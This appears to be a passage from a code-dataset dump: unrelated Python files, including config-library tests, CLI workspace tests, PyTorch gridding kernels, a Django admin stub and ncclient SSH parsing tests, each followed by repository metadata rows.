assert cfg.configs[0] == config_from_dict(DICT2_2, lowercase_keys=True)
# writable configs
cfg = ConfigurationSet(
config_from_dict(DICT2_1, lowercase_keys=True),
config_from_dict(DICT2_2, lowercase_keys=True),
config_from_env(prefix=PREFIX, lowercase_keys=True),
)
cfg.update({"abc": "xyz"})
assert cfg.configs[0] == config_from_dict(DICT2_1, lowercase_keys=True)
cfg.configs = cfg.configs[1:]
assert cfg.configs[0] == config_from_dict(DICT2_2, lowercase_keys=True)
def test_separator(): # type: ignore
import sys
import tempfile
path = os.path.join(os.path.dirname(__file__), "python_config_2.py")
with tempfile.TemporaryDirectory() as folder:
create_path_from_config(folder, config_from_dict(PATH_DICT), remove_level=0)
entries = [
("env", PREFIX),
("python", path, "CONFIG", "__"),
]
cfg = config(*entries, lowercase_keys=True)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts["sys.version"] = sys.hexversion
assert (
config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
)
assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_separator_override_default(): # type: ignore
import sys
import tempfile
path = os.path.join(os.path.dirname(__file__), "python_config.py")
with tempfile.TemporaryDirectory() as folder:
create_path_from_config(folder, config_from_dict(PATH_DICT), remove_level=0)
entries = [
("env", PREFIX, "__"),
("python", path, "CONFIG"),
]
cfg = config(*entries, separator="_", lowercase_keys=True)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts["sys.version"] = sys.hexversion
assert (
config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
)
assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_same_as_configuration(): # type: ignore
cfg = config_from_dict(DICT2_1, lowercase_keys=True)
cfgset = ConfigurationSet(config_from_dict(DICT2_1, lowercase_keys=True))
assert cfg.get_dict("a2") == cfgset.get_dict("a2")
assert cfg.a2.as_dict() == cfgset.a2.as_dict()
assert dict(cfg.a2) == dict(cfgset.a2)
assert dict(cfg.a2) == dict(cfg.a2.items())
assert dict(cfgset.a2) == dict(cfgset.a2.items())
assert cfg.as_dict() == cfgset.as_dict()
assert dict(cfg) == dict(cfgset)
def test_merging_values(): # type: ignore
DICT5_1 = {"a5.b1.c2": 3}
DICT5_2 = {"a5.b1.c1": 1, "a5.b1.c2": 2}
cfg = ConfigurationSet(
config_from_dict(DICT5_1),
config_from_dict(DICT5_2),
)
assert cfg["a5.b1"] == {"c1": 1, "c2": 3}
assert cfg.a5.b1 == {"c1": 1, "c2": 3}
| 28.690205 | 102 | 0.562604 | 3,184 | 25,190 | 4.282349 | 0.079774 | 0.058893 | 0.072314 | 0.033443 | 0.824202 | 0.79956 | 0.773084 | 0.740887 | 0.710011 | 0.687495 | 0 | 0.050305 | 0.28424 | 25,190 | 877 | 103 | 28.722919 | 0.705935 | 0.037634 | 0 | 0.552342 | 0 | 0.004132 | 0.132556 | 0 | 0 | 0 | 0 | 0 | 0.096419 | 1 | 0.027548 | false | 0 | 0.034435 | 0 | 0.061983 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6af4521369cc692597fe497e499b50be6eaa2727 | 72 | py | Python | foundation/backend/views/controller/mixins/__init__.py | tbone255/foundation | ca76fdd9b5345fead2d200f829eb67ba77bc865e | [
"MIT"
] | null | null | null | foundation/backend/views/controller/mixins/__init__.py | tbone255/foundation | ca76fdd9b5345fead2d200f829eb67ba77bc865e | [
"MIT"
] | null | null | null | foundation/backend/views/controller/mixins/__init__.py | tbone255/foundation | ca76fdd9b5345fead2d200f829eb67ba77bc865e | [
"MIT"
] | null | null | null | from .pagination import *
from .search import *
from . import variables
| 18 | 25 | 0.763889 | 9 | 72 | 6.111111 | 0.555556 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 72 | 3 | 26 | 24 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ed124098e07e9d6a0c5058dbebb9d67f6b31b93a | 9,491 | py | Python | tests/commands/test_cmd_workspace.py | bossjones/ultron8 | 45db73d32542a844570d44bc83defa935e15803f | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/commands/test_cmd_workspace.py | bossjones/ultron8 | 45db73d32542a844570d44bc83defa935e15803f | [
"Apache-2.0",
"MIT"
] | 43 | 2019-06-01T23:08:32.000Z | 2022-02-07T22:24:53.000Z | tests/commands/test_cmd_workspace.py | bossjones/ultron8 | 45db73d32542a844570d44bc83defa935e15803f | [
"Apache-2.0",
"MIT"
] | null | null | null | import os
import shutil
import sys
import click
from click.testing import CliRunner
from fastapi.encoders import jsonable_encoder
import pytest
from ultron8 import config
from ultron8.api.factories.users import _MakeRandomNormalUserFactory
from ultron8.cli import cli
from ultron8.client import UltronAPI
from ultron8.config import ConfigManager, do_get_flag, do_set_flag
from ultron8.config.manager import ConfigProxy, NullConfig
from ultron8.core.files import load_json_file
from ultron8.core.workspace import CliWorkspace, prep_default_config
from tests.conftest import fixtures_path
from tests.utils.filesystem import helper_write_yaml_to_disk
from tests.utils.utils import get_superuser_jwt_request
@pytest.mark.skipif(
sys.stdout.encoding not in ["UTF-8", "UTF8"],
reason="Need UTF-8 terminal (not {})".format(sys.stdout.encoding),
)
@pytest.mark.clionly
@pytest.mark.integration
class TestCliWorkspaceCmd:
def test_cli_workspace_no_args(self, request, monkeypatch) -> None:
# reset global config singleton
config._CONFIG = None
fixture_path = fixtures_path / "isolated_config_dir"
print(fixture_path)
runner = CliRunner()
with runner.isolated_filesystem() as isolated_dir:
# Populate filesystem folders
isolated_base_dir = isolated_dir
isolated_xdg_config_home_dir = os.path.join(isolated_dir, ".config")
isolated_ultron_config_dir = os.path.join(
isolated_xdg_config_home_dir, "ultron8"
)
isolated_ultron_config_path = os.path.join(
isolated_ultron_config_dir, "smart.yaml"
)
# create base dirs
os.makedirs(isolated_xdg_config_home_dir)
# request.cls.home = isolated_base_dir
# request.cls.xdg_config_home = isolated_xdg_config_home_dir
# request.cls.ultron_config_dir = isolated_ultron_config_dir
# request.cls.ultron_config_path = isolated_ultron_config_path
# monkeypatch env vars to trick intgr tests into running only in isolated file system
monkeypatch.setenv("HOME", isolated_base_dir)
monkeypatch.setenv("XDG_CONFIG_HOME", isolated_xdg_config_home_dir)
monkeypatch.setenv("ULTRON8DIR", isolated_ultron_config_dir)
# Copy the project fixture into the isolated filesystem dir.
shutil.copytree(fixture_path, isolated_ultron_config_dir)
# Monkeypatch a helper method onto the runner to make running commands
# easier.
runner.run = lambda command: runner.invoke(cli, command.split())
# And another for checkout the text output by the command.
runner.output_of = lambda command: runner.run(command).output
# Run click test client
result = runner.invoke(cli, ["workspace"])
# verify results
assert result.exit_code == 0
assert "Usage: cli workspace [OPTIONS] COMMAND [ARGS]..." in result.output
assert "Interact with workspace for ultron8." in result.output
assert "Options:" in result.output
assert "--help Show this message and exit." in result.output
assert "Commands:" in result.output
assert "info Info on workspace" in result.output
assert "tree Tree command for Workspace" in result.output
def test_cli_workspace_tree(self, request, monkeypatch) -> None:
# reset global config singleton
config._CONFIG = None
fixture_path = fixtures_path / "isolated_config_dir"
print(fixture_path)
runner = CliRunner()
with runner.isolated_filesystem() as isolated_dir:
# Populate filesystem folders
isolated_base_dir = isolated_dir
isolated_xdg_config_home_dir = os.path.join(isolated_dir, ".config")
isolated_ultron_config_dir = os.path.join(
isolated_xdg_config_home_dir, "ultron8"
)
isolated_ultron_config_path = os.path.join(
isolated_ultron_config_dir, "smart.yaml"
)
# create base dirs
os.makedirs(isolated_xdg_config_home_dir)
# request.cls.home = isolated_base_dir
# request.cls.xdg_config_home = isolated_xdg_config_home_dir
# request.cls.ultron_config_dir = isolated_ultron_config_dir
# request.cls.ultron_config_path = isolated_ultron_config_path
# monkeypatch env vars to trick intgr tests into running only in isolated file system
monkeypatch.setenv("HOME", isolated_base_dir)
monkeypatch.setenv("XDG_CONFIG_HOME", isolated_xdg_config_home_dir)
monkeypatch.setenv("ULTRON8DIR", isolated_ultron_config_dir)
# Copy the project fixture into the isolated filesystem dir.
shutil.copytree(fixture_path, isolated_ultron_config_dir)
# Grab access token
r = get_superuser_jwt_request()
tokens = r.json()
a_token = tokens["access_token"]
example_data = """
clusters_path: clusters/
cache_path: cache/
workspace_path: workspace/
templates_path: templates/
flags:
debug: 0
verbose: 0
keep: 0
stderr: 0
repeat: 1
clusters:
instances:
local:
url: http://localhost:11267
token: '{}'
""".format(
a_token
)
# overwrite smart.yaml w/ config that has auth token in it.
helper_write_yaml_to_disk(example_data, isolated_ultron_config_path)
# Monkeypatch a helper method onto the runner to make running commands
# easier.
runner.run = lambda command: runner.invoke(cli, command.split())
# And another for checkout the text output by the command.
runner.output_of = lambda command: runner.run(command).output
# Run click test client
result = runner.invoke(cli, ["--debug", "workspace", "tree"])
print(result)
# verify results
assert result.exit_code == 0
# TODO: Use the capture fixture and test that it looks like this
# + /Users/malcolm/.config/ultron8
# + clusters
# + libs
# + smart.yaml
# + templates
# + workspace
def test_cli_workspace_info(self, request, monkeypatch) -> None:
# reset global config singleton
config._CONFIG = None
fixture_path = fixtures_path / "isolated_config_dir"
print(fixture_path)
runner = CliRunner()
with runner.isolated_filesystem() as isolated_dir:
# Populate filesystem folders
isolated_base_dir = isolated_dir
isolated_xdg_config_home_dir = os.path.join(isolated_dir, ".config")
isolated_ultron_config_dir = os.path.join(
isolated_xdg_config_home_dir, "ultron8"
)
isolated_ultron_config_path = os.path.join(
isolated_ultron_config_dir, "smart.yaml"
)
# create base dirs
os.makedirs(isolated_xdg_config_home_dir)
# request.cls.home = isolated_base_dir
# request.cls.xdg_config_home = isolated_xdg_config_home_dir
# request.cls.ultron_config_dir = isolated_ultron_config_dir
# request.cls.ultron_config_path = isolated_ultron_config_path
# monkeypatch env vars to trick intgr tests into running only in isolated file system
monkeypatch.setenv("HOME", isolated_base_dir)
monkeypatch.setenv("XDG_CONFIG_HOME", isolated_xdg_config_home_dir)
monkeypatch.setenv("ULTRON8DIR", isolated_ultron_config_dir)
# Copy the project fixture into the isolated filesystem dir.
shutil.copytree(fixture_path, isolated_ultron_config_dir)
# Grab access token
r = get_superuser_jwt_request()
tokens = r.json()
a_token = tokens["access_token"]
example_data = """
clusters_path: clusters/
cache_path: cache/
workspace_path: workspace/
templates_path: templates/
flags:
debug: 0
verbose: 0
keep: 0
stderr: 0
repeat: 1
clusters:
instances:
local:
url: http://localhost:11267
token: '{}'
""".format(
a_token
)
# overwrite smart.yaml w/ config that has auth token in it.
helper_write_yaml_to_disk(example_data, isolated_ultron_config_path)
# Monkeypatch a helper method onto the runner to make running commands
# easier.
runner.run = lambda command: runner.invoke(cli, command.split())
# And another for checkout the text output by the command.
runner.output_of = lambda command: runner.run(command).output
# Run click test client
result = runner.invoke(cli, ["--debug", "workspace", "info"])
print(result)
# verify results
assert result.exit_code == 0
# TODO: Use the capture fixture and test that it looks like this
# + /Users/malcolm/.config/ultron8
# + clusters
# + libs
# + smart.yaml
# + templates
# + workspace
| 37.366142 | 97 | 0.639343 | 1,090 | 9,491 | 5.319266 | 0.169725 | 0.060021 | 0.079338 | 0.054329 | 0.808037 | 0.804415 | 0.804415 | 0.798551 | 0.798551 | 0.798551 | 0 | 0.006386 | 0.290591 | 9,491 | 253 | 98 | 37.513834 | 0.854745 | 0.243178 | 0 | 0.691275 | 0 | 0 | 0.152345 | 0 | 0 | 0 | 0 | 0.003953 | 0.067114 | 1 | 0.020134 | false | 0 | 0.120805 | 0 | 0.147651 | 0.033557 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed3f1677749c876db7dd0fffbd717e8ea0f63d3e | 6,246 | py | Python | InLine_Implementation/Code/complexnet/gridkernels.py | HMS-CardiacMR/MyoMapNet-Myocardial-Parametric-Mapping | 1e2dee8d6d1f97722eba91618462537faf9efba7 | [
"MIT"
] | 4 | 2021-12-15T22:57:44.000Z | 2022-03-18T14:02:15.000Z | InLine_Implementation/Code/complexnet/gridkernels.py | HMS-CardiacMR/MyoMapNet | 1e2dee8d6d1f97722eba91618462537faf9efba7 | [
"MIT"
] | null | null | null | InLine_Implementation/Code/complexnet/gridkernels.py | HMS-CardiacMR/MyoMapNet | 1e2dee8d6d1f97722eba91618462537faf9efba7 | [
"MIT"
] | null | null | null |
import torch
import numpy as np
import torch.nn as nn
from saveNet import *
from math import exp
def sinc(input, weights):
x, y = torch.unbind(input, dim=-1)
b, c = torch.unbind(weights, dim=-1)
mag = np.pi * ((b*x)**2 + (c*y)**2)**0.5
output = torch.sin(mag)/mag
return output
class GriddingKernels(nn.Module):
def __init__(self, kernel_mat_size=(416, 416), eps=0.0001, init_densiy=None, init_kernel_param=None):
super(GriddingKernels, self).__init__()
self.eps = eps
self.a = nn.Parameter(torch.ones((kernel_mat_size[0], kernel_mat_size[1])), requires_grad=True)
self.b = nn.Parameter(torch.ones((kernel_mat_size[0], kernel_mat_size[1], 2)), requires_grad=True) #for x and y
self.reset_density_comp_params(init_densiy)
self.reset_kernel_params(init_kernel_param)
def reset_density_comp_params(self, init_densiy=None, s=0.025, bias=0.125):
if init_densiy is None:
for i in range(0, self.a.shape[0]):
for j in range(0, self.a.shape[1]):
self.a.data[i, j] = s * (
(i - self.a.shape[0] // 2) ** 2 + (j - self.a.shape[1] // 2) ** 2) ** 0.5 + bias
else:
self.a.data = init_densiy
def reset_kernel_params(self, init_kernel_param=None, s=0.005, bias=0.05):
if init_kernel_param is None:
for i in range(0, self.b.shape[0]):
for j in range(0, self.b.shape[1]):
self.b.data[i, j, 0] = s * (
(i - self.b.shape[0] // 2) ** 2 + (j - self.b.shape[1] // 2) ** 2) ** 0.5 + bias
self.b.data[i, j, 1] = s * (
(i - self.b.shape[0] // 2) ** 2 + (j - self.b.shape[1] // 2) ** 2) ** 0.5 + bias
# self.b.data[i, j, 2] = s * ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2) ** 0.5 + 2 * s
else:
self.a.data = init_kernel_param
# def reset_density_comp_params(self, init_densiy=None):
# if init_densiy is None:
# r = 10/(self.a.shape[0]//2)
# for i in range(0, self.a.shape[0]):
# for j in range(0, self.a.shape[1]):
# self.a.data[i, j] = r * ((i-self.a.shape[0]//2)**2 + (j-self.a.shape[1]//2)**2)**0.5 + 2*r
# else:
# self.a.data = init_densiy
#
# def reset_kernel_params(self, init_kernel_param=None):
# if init_kernel_param is None:
# kernel_window_size = 10
# s = (self.b.shape[0]//2) / kernel_window_size
#
# for i in range(0, self.b.shape[0]):
# for j in range(0, self.b.shape[1]):
# self.b.data[i, j, 0] = s / ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2 + 1) ** 0.5
# self.b.data[i, j, 1] = s / ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2 + 1) ** 0.5
# # self.b.data[i, j, 2] = s * ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2) ** 0.5 + 2 * s
# else:
# self.a.data = init_kernel_param
def forward(self, Ksp_ri, Loc_xy):
Loc_xy = Loc_xy + self.eps
dims = Ksp_ri.shape
brdcst_a = self.a.unsqueeze(0).unsqueeze(0).unsqueeze(-1).expand((dims[0], dims[1], dims[3], dims[4], dims[5]))
brdcst_b = self.b.unsqueeze(0).unsqueeze(0).expand_as(Loc_xy)
kernel = sinc(Loc_xy, brdcst_b).unsqueeze(1).unsqueeze(-1).expand_as(Ksp_ri)
output = brdcst_a * torch.mean(Ksp_ri * kernel, dim=2)
return output
def gaussian(input, weights):
x, y = torch.unbind(input, dim=-1)
b, c = torch.unbind(weights, dim=-1)
output = torch.exp(-( (x/b)**2 + (y/c)**2))
return output
class GaussianGriddingKernels(nn.Module):
def __init__(self, kernel_mat_size=(416, 416), init_densiy=None, init_kernel_param=None):
super(GaussianGriddingKernels, self).__init__()
self.a = nn.Parameter(torch.ones((kernel_mat_size[0], kernel_mat_size[1])), requires_grad=False)
self.b = nn.Parameter(torch.ones((kernel_mat_size[0], kernel_mat_size[1], 2)),
requires_grad=True) # for x and y
self.reset_density_comp_params(init_densiy)
self.reset_kernel_params(init_kernel_param)
def reset_density_comp_params(self, init_densiy=None, s=1/208, bias=0.02):
if init_densiy is None:
for i in range(0, self.a.shape[0]):
for j in range(0, self.a.shape[1]):
self.a.data[i, j] = s * (
(i - self.a.shape[0] // 2) ** 2 + (j - self.a.shape[1] // 2) ** 2) ** 0.5 + bias
else:
self.a.data = init_densiy
def reset_kernel_params(self, init_kernel_param=None, s=0.0002, bias=1):
if init_kernel_param is None:
for i in range(0, self.b.shape[0]):
for j in range(0, self.b.shape[1]):
self.b.data[i, j, 0] = s * (
(i - self.b.shape[0] // 2) ** 2 + (j - self.b.shape[1] // 2) ** 2) ** 0.5 + bias
self.b.data[i, j, 1] = s * (
(i - self.b.shape[0] // 2) ** 2 + (j - self.b.shape[1] // 2) ** 2) ** 0.5 + bias
# self.b.data[i, j, 2] = s * ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2) ** 0.5 + 2 * s
else:
self.a.data = init_kernel_param
def forward(self, Ksp_ri, Loc_xy):
dims = Ksp_ri.shape
# print('==================>',self.b[207,207,0].cpu().data.numpy())
# brdcst_a = self.a.unsqueeze(0).unsqueeze(0).unsqueeze(-1).expand((dims[0], dims[1], dims[3], dims[4], dims[5]))
brdcst_b = self.b.unsqueeze(0).unsqueeze(0).expand_as(Loc_xy)
# x, y = torch.unbind(Loc_xy, dim=-1)
# denst = (2*((x**2 + y**2)**0.5)/dims[-2]).unsqueeze(1).unsqueeze(-1).expand_as(Ksp_ri)
# Ksp_ri = denst * Ksp_ri
kernel = gaussian(Loc_xy, brdcst_b).unsqueeze(1).unsqueeze(-1).expand_as(Ksp_ri)
# output = brdcst_a * torch.mean(Ksp_ri * kernel, dim=2)
output = torch.mean(Ksp_ri * kernel, dim=2)
return output
| 44.614286 | 125 | 0.527858 | 1,001 | 6,246 | 3.151848 | 0.095904 | 0.057052 | 0.0729 | 0.045642 | 0.827892 | 0.81458 | 0.80729 | 0.80729 | 0.772742 | 0.757211 | 0 | 0.056826 | 0.292827 | 6,246 | 139 | 126 | 44.935252 | 0.65746 | 0.261447 | 0 | 0.609756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121951 | false | 0 | 0.060976 | 0 | 0.256098 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
92ebd9acff8242bbbb3b1d706d35994d783ca754 | 749 | py | Python | code/Tragedy.py | HarshRat/hacktoberfest-2018 | 77b0896d8fab34536bb1361085e8afcab9b5430f | [
"MIT"
] | null | null | null | code/Tragedy.py | HarshRat/hacktoberfest-2018 | 77b0896d8fab34536bb1361085e8afcab9b5430f | [
"MIT"
] | null | null | null | code/Tragedy.py | HarshRat/hacktoberfest-2018 | 77b0896d8fab34536bb1361085e8afcab9b5430f | [
"MIT"
] | null | null | null | print("Did you ever hear the tragedy of Darth Plagueis The Wise? I thought not. It's not a story the Jedi would tell you. It's a Sith legend. Darth Plagueis was a Dark Lord of the Sith, so powerful and so wise he could use the Force to influence the midichlorians to create life… He had such a knowledge of the dark side that he could even keep the ones he cared about from dying. The dark side of the Force is a pathway to many abilities some consider to be unnatural. He became so powerful… the only thing he was afraid of was losing his power, which eventually, of course, he did. Unfortunately, he taught his apprentice everything he knew, then his apprentice killed him in his sleep. Ironic. He could save others from death, but not himself.")
| 374.5 | 748 | 0.782377 | 143 | 749 | 4.13986 | 0.594406 | 0.025338 | 0.037162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184246 | 749 | 1 | 749 | 749 | 0.959083 | 0 | 0 | 0 | 0 | 1 | 0.986649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
132554c79d368c2659a005c8f3de4f2f4a6079dd | 149 | py | Python | algorithms/library/methods/usg/__init__.py | heitor57/poi-rss | 12990af118f19595be01bf80e26a7ee93f9d05d8 | [
"MIT"
] | 1 | 2021-09-01T23:55:27.000Z | 2021-09-01T23:55:27.000Z | algorithms/library/methods/usg/__init__.py | heitor57/poi-rss | 12990af118f19595be01bf80e26a7ee93f9d05d8 | [
"MIT"
] | 1 | 2021-09-09T06:21:48.000Z | 2021-09-14T02:08:33.000Z | algorithms/library/methods/usg/__init__.py | heitor57/poi-rss | 12990af118f19595be01bf80e26a7ee93f9d05d8 | [
"MIT"
] | null | null | null | import sys, os
sys.path.insert(0, os.path.abspath('..'))
from . import UserBasedCF
from . import FriendBasedCF
from . import PowerLaw
import metrics
| 21.285714 | 41 | 0.758389 | 21 | 149 | 5.380952 | 0.571429 | 0.265487 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007692 | 0.127517 | 149 | 6 | 42 | 24.833333 | 0.861538 | 0 | 0 | 0 | 0 | 0 | 0.013423 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
135cdadeef5241976b2252c32b0193fc1e47d12b | 143 | py | Python | web/peerstachio/apps/todo/admin.py | FuzedxPheonix/peerstachio-opensource | f681c7454ee795667c32a785809b0f88e4d432fa | [
"Unlicense"
] | 2 | 2019-07-30T14:28:13.000Z | 2020-07-25T04:48:43.000Z | web/peerstachio/apps/todo/admin.py | FuzedxPheonix/peerstachio-opensource | f681c7454ee795667c32a785809b0f88e4d432fa | [
"Unlicense"
] | 9 | 2020-06-05T22:12:20.000Z | 2022-01-13T01:28:05.000Z | web/peerstachio/apps/todo/admin.py | FuzedxPheonix/peerstachio-opensource | f681c7454ee795667c32a785809b0f88e4d432fa | [
"Unlicense"
] | 1 | 2019-10-21T01:19:13.000Z | 2019-10-21T01:19:13.000Z | from django.contrib import admin
from .models import Item
class ItemAdmin(admin.ModelAdmin):
pass
admin.site.register(Item, ItemAdmin)
| 14.3 | 36 | 0.776224 | 19 | 143 | 5.842105 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146853 | 143 | 9 | 37 | 15.888889 | 0.909836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
13b60663eac0d399166fb39f8f215936c3f6efe6 | 15,544 | py | Python | test/unit/transport/test_ssh.py | CiscoDevNet/ncclient | ab705fbe5eb7cae23e96e0682273fc9c2ed61739 | [
"Apache-2.0"
] | 7 | 2017-07-13T21:20:21.000Z | 2021-03-13T05:15:53.000Z | test/unit/transport/test_ssh.py | CiscoDevNet/ncclient | ab705fbe5eb7cae23e96e0682273fc9c2ed61739 | [
"Apache-2.0"
] | 3 | 2018-01-09T14:03:47.000Z | 2018-11-04T22:29:54.000Z | test/unit/transport/test_ssh.py | CiscoDevNet/ncclient | ab705fbe5eb7cae23e96e0682273fc9c2ed61739 | [
"Apache-2.0"
] | 7 | 2017-08-23T15:49:24.000Z | 2021-04-22T05:51:46.000Z | # -*- coding: utf-8 -*-
import unittest
try:
from unittest.mock import MagicMock, patch # Python 3.4 and later
except ImportError:
from mock import MagicMock, patch
from ncclient.transport.ssh import SSHSession
from ncclient.transport import AuthenticationError, SessionCloseError, NetconfBase
import paramiko
from ncclient.devices.junos import JunosDeviceHandler
import sys
import socket
try:
import selectors
except ImportError:
import selectors2 as selectors
reply_data = """<rpc-reply xmlns:junos="http://xml.juniper.net/junos/12.1X46/junos" attrib1 = "test">
<software-information>
<host-name>R1</host-name>
<product-model>firefly-perimeter</product-model>
<product-name>firefly-perimeter</product-name>
<package-information>
<name>junos</name>
<comment>JUNOS Software Release [12.1X46-D10.2]</comment>
</package-information>
</software-information>
<cli>
<banner></banner>
</cli>
</rpc-reply>"""
reply_ok = """<rpc-reply>
<ok/>
<rpc-reply/>"""
# A buffer of data with two complete messages and an incomplete message
rpc_reply = reply_data + "\n]]>]]>\n" + reply_ok + "\n]]>]]>\n" + reply_ok
reply_ok_chunk = "\n#%d\n%s\n##\n" % (len(reply_ok), reply_ok)
# einarnn: this test message had to be reduced in size as the improved
# 1.1 parsing finds a whole fragment in it, so needed to have less
# data in it than the terminating '>'
reply_ok_partial_chunk = "\n#%d\n%s" % (len(reply_ok), reply_ok[:-1])
# A buffer of data with two complete messages and an incomplete message
rpc_reply11 = "\n#%d\n%s\n#%d\n%s\n##\n%s%s" % (
30, reply_data[:30], len(reply_data[30:]), reply_data[30:],
reply_ok_chunk, reply_ok_partial_chunk)
rpc_reply_part_1 = """<rpc-reply xmlns:junos="http://xml.juniper.net/junos/12.1X46/junos" attrib1 = "test">
<software-information>
<host-name>R1</host-name>
<product-model>firefly-perimeter</product-model>
<product-name>firefly-perimeter</product-name>
<package-information>
<name>junos</name>
<comment>JUNOS Software Release [12.1X46-D10.2]</comment>
</package-information>
</software-information>
<cli>
<banner></banner>
</cli>
</rpc-reply>
]]>]]"""
rpc_reply_part_2 = """>
<rpc-reply>
<ok/>
<rpc-reply/>"""
class TestSSH(unittest.TestCase):
def _test_parsemethod(self, mock_dispatch, parsemethod, reply, ok_chunk,
expected_messages):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
if sys.version >= "3.0":
obj._buffer.write(bytes(reply, "utf-8"))
remainder = bytes(ok_chunk, "utf-8")
else:
obj._buffer.write(reply)
remainder = ok_chunk
# parse the main reply
parsemethod(obj)
# parse the ok
parsemethod(obj)
for i in range(0, len(expected_messages)):
call = mock_dispatch.call_args_list[i][0][0]
self.assertEqual(call, expected_messages[i])
self.assertEqual(obj._buffer.getvalue(), remainder)
@patch('ncclient.transport.ssh.Session._dispatch_message')
def test_parse(self, mock_dispatch):
self._test_parsemethod(mock_dispatch, SSHSession._parse, rpc_reply,
"\n" + reply_ok, [reply_data])
@patch('ncclient.transport.ssh.Session._dispatch_message')
def test_parse11(self, mock_dispatch):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
if sys.version >= "3.0":
obj._buffer.write(bytes(rpc_reply11, "utf-8"))
remainder = bytes(reply_ok_partial_chunk, "utf-8")
else:
obj._buffer.write(rpc_reply11)
remainder = reply_ok_partial_chunk
obj.parser._parse11()
expected_messages = [reply_data, reply_ok]
for i in range(0, len(expected_messages)):
call = mock_dispatch.call_args_list[i][0][0]
self.assertEqual(call, expected_messages[i])
self.assertEqual(obj._buffer.getvalue(), remainder)
@patch('ncclient.transport.ssh.Session._dispatch_message')
def test_parse_incomplete_delimiter(self, mock_dispatch):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
if sys.version >= "3.0":
b = bytes(rpc_reply_part_1, "utf-8")
obj._buffer.write(b)
obj._parse()
self.assertFalse(mock_dispatch.called)
b = bytes(rpc_reply_part_2, "utf-8")
obj._buffer.write(b)
obj._parse()
self.assertTrue(mock_dispatch.called)
else:
obj._buffer.write(rpc_reply_part_1)
obj._parse()
self.assertFalse(mock_dispatch.called)
obj._buffer.write(rpc_reply_part_2)
obj._parse()
self.assertTrue(mock_dispatch.called)
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.agent.AgentSSH.get_keys')
def test_auth_agent(self, mock_get_key, mock_auth_public_key):
key = paramiko.PKey(msg="hello")
